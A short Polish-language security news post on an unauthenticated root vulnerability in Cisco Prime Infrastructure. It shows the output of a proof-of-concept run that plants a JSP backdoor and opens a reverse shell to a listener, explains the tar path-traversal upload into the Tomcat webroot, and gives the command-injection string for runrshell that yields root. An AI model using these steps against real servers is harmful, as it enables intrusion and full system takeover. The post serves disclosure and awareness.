Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia

Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu:

$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit

Jaka jest istota podatności? Mamy tutaj dwa problemy – pierwszy to możliwość anonimowego uploadu spakowanego do .tar pliku .jsp – ale trzeba wykorzystać dodatkowy trick: nazwa pliku w archiwum musi „wyjść” do odpowiedniego katalogu. Pakujemy więc: ../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp

W skrócie, możemy nasz backdoor w .jsp wypakować do niemal dowolnego katalogu na serwerze (jeśli ktoś chce w pełni prześledzić ten trick, zachęcam do zerknięcia na podatność nr 1 z naszego publicznego raportu z pentestów).

Później już tylko banalna eskalacja uprawnień do roota w poleceniu runrshell: /opt/CSCOlumos/bin/runrshell '” && /bin/sh #’  i voila:

sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root)

–ms